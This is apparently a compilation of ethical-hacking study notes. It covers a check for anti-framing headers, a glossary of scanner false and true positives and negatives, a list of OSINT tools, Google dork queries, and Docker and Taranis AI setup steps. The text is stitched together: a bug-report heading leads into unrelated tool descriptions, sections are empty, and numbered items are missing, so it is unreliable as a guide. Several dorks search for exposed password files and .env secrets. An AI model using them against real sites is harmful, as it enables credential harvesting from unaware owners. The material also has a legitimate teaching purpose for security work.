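A quick way to check whether a page like the one above can be framed at all is to look for anti-framing headers in its response. An offline sketch (headers.txt stands in for the output of `curl -sI https://target.example`):

```shell
# Saved response headers; note there is no X-Frame-Options and no
# Content-Security-Policy (frame-ancestors), so framing is allowed.
cat > headers.txt <<'EOF'
HTTP/1.1 200 OK
Content-Type: text/html
EOF

if grep -qiE '^(x-frame-options|content-security-policy)' headers.txt; then
  echo "framing protection present"
else
  echo "no framing protection: page may be clickjackable"
fi
```

If neither header appears, load the page in the iframe PoC above to confirm.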
1. False Positive
Definition: A vulnerability is incorrectly flagged as present, but it does not actually exist.
Example: An automated security tool mistakenly identifies a harmless code snippet as a SQL
Injection vulnerability.
Implications: Leads to wasted time investigating non-existent issues, which can slow down the
vulnerability assessment process.
Key Takeaway: Ensure thorough manual validation to avoid acting on false alarms.
2. True Positive
Definition: A vulnerability is correctly identified as present.
Types:
• Automatically Corrected: The system detects and resolves the issue without human
intervention.
• Manually Corrected: The system flags the issue, and a security analyst confirms and remediates
it.
Example: A scanner identifies and patches a known outdated dependency (automatic) or flags an
XSS vulnerability that a developer confirms and fixes (manual).
Implications: Shows the system is effective in detecting actual vulnerabilities, but manual review
may still be required for thoroughness.
Key Takeaway: Balance between automation and manual validation improves overall accuracy and
resolution.
3. False Negative
Definition: A vulnerability is present, but the tool fails to detect it.
Example: An automated tool fails to identify an insecure API endpoint vulnerable to unauthorized
access.
Implications: These are the most dangerous as they provide a false sense of security, leaving
systems exposed.
Key Takeaway: Regularly update tools and perform manual penetration testing to uncover missed
vulnerabilities.
4. True Negative
Definition: No vulnerability is present, and the system correctly identifies that no issue exists.
Example: A secure web application undergoes scanning, and the tool accurately reports no
vulnerabilities.
Implications: Confirms the accuracy of the tool, minimizing unnecessary alerts and providing
confidence in the system's security.
Key Takeaway: Strive for a high true negative rate to reduce false alarms and improve operational
efficiency.
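The four outcomes above combine into the standard accuracy metrics for a scanner; a sketch with made-up counts:

```shell
# Hypothetical scan results: counts of each outcome type.
TP=40; FP=10; FN=5; TN=945

# Precision: of everything flagged, what share was a real vulnerability?
# Recall: of every real vulnerability, what share was flagged?
precision=$(( 100 * TP / (TP + FP) ))
recall=$(( 100 * TP / (TP + FN) ))
echo "precision=${precision}% recall=${recall}%"
```

High precision means fewer false alarms to triage; high recall means fewer dangerous false negatives.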
40. EHP Do’s and Don’ts in Bug Report writing
Cylect is an advanced OSINT (Open-Source Intelligence) tool that leverages AI to streamline the
process of gathering publicly available information. Its primary purpose is to assist cybersecurity
professionals, investigators, and researchers in acquiring actionable intelligence from diverse
sources. Below are some key features and functionalities you might expect from a tool like Cylect:
Key Features:
• Extracts information from websites, social media platforms, and public databases.
• Scrapes data from various forums, blogs, and news outlets.
AI-Powered Analysis:
• Uses machine learning to identify patterns, trends, and anomalies in collected data.
• Offers sentiment analysis for social media content and articles.
Multi-Layered Search:
• Supports deep web and dark web exploration using anonymizing networks like Tor.
• Advanced search capabilities to refine and filter data effectively.
Data Visualization:
Real-Time Monitoring:
• Includes features to ensure ethical usage and compliance with legal standards.
Report Generation:
• Provides detailed and shareable reports in various formats (PDF, JSON, etc.).
• Includes actionable insights for decision-making.
Applications:
1. Maltego: A comprehensive link analysis tool that can be enhanced with AI modules for advanced
entity analysis.
Website: https://www.maltego.com
2. Social-Searcher: Incorporates basic AI for sentiment and trend analysis on social media.
Website: https://www.social-searcher.com
3. Twint: An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API,
allowing you to scrape a user's followers, following, Tweets and more while evading most API
limitations.
Website: https://github.com/twintproject/twint
4. FOCA: A tool for finding metadata and hidden information in documents published on websites.
Website: https://github.com/ElevenPaths/FOCA
theHarvester
Recon-ng
SpiderFoot
Shodan
Censys
DorkGPT
Site: https://www.dorkgpt.com/
Google Dorking (or Google hacking) is a method of using advanced search operators in Google to
uncover sensitive information, vulnerabilities, or flaws in websites and web applications. These
operators can help find misconfigurations, exposed databases, administrative panels, and other
sensitive data that shouldn't be publicly accessible.
Here are some examples of Google Dorks that can be used to discover potential vulnerabilities in web applications. Remember, using these techniques for malicious purposes is unethical and often illegal, so ensure your actions stay within legal boundaries (e.g., authorized penetration testing or vulnerability scanning).
Examples
# 7. Search for publicly exposed PHP error messages (may contain vulnerabilities):
inurl:"error_log" filetype:log
# 8. Find exposed sensitive files (like usernames and passwords in text files):
filetype:txt "username" "password"
# 12. Find publicly exposed .env configuration files (often used for environment variables):
filetype:env
# 15. Look for error pages that may provide server details or vulnerabilities:
inurl:"404" intitle:"Not Found"
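Dorks are just search strings; a small shell helper can URL-encode one into a shareable search link (the dork and domain shown are examples):

```shell
# Example dork: hunt for exposed .env files on one (placeholder) domain.
dork='site:example.com filetype:env'

# Minimal encoding for this dork: spaces become '+', colons become '%3A'.
encoded=$(printf '%s' "$dork" | sed 's/ /+/g; s/:/%3A/g')
echo "https://www.google.com/search?q=${encoded}"
```

A full implementation would percent-encode every reserved character, but this covers typical dorks.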
Extra Links:
Generate Dork
https://www.yeschat.ai/gpts-9t557DT1RUP-GrokGPT
All GPTs with instant access: discover and try over 10,000 top GPTs for free, without ChatGPT Plus.
https://www.yeschat.ai/
Link:
https://taranis.ai/
https://www.kali.org/docs/containers/installing-docker-on-kali/
>> docker
Manual Installation of the Docker Compose Plugin: If the above steps do not resolve the issue, you can manually install the Docker Compose plugin:
>> DOCKER_CONFIG=${DOCKER_CONFIG:-$HOME/.docker}
>> mkdir -p $DOCKER_CONFIG/cli-plugins
>> curl -SL https://github.com/docker/compose/releases/download/v2.12.2/docker-compose-linux-x86_64 -o $DOCKER_CONFIG/cli-plugins/docker-compose
>> chmod +x $DOCKER_CONFIG/cli-plugins/docker-compose
Verify Installation: Check the Docker Compose version to verify the installation:
>> docker compose version
Now install Taranis AI
https://taranis.ai/docs/getting-started/deployment/
Deployment
How to deploy Taranis AI
Clone via git
Configuration
Copy env.sample to .env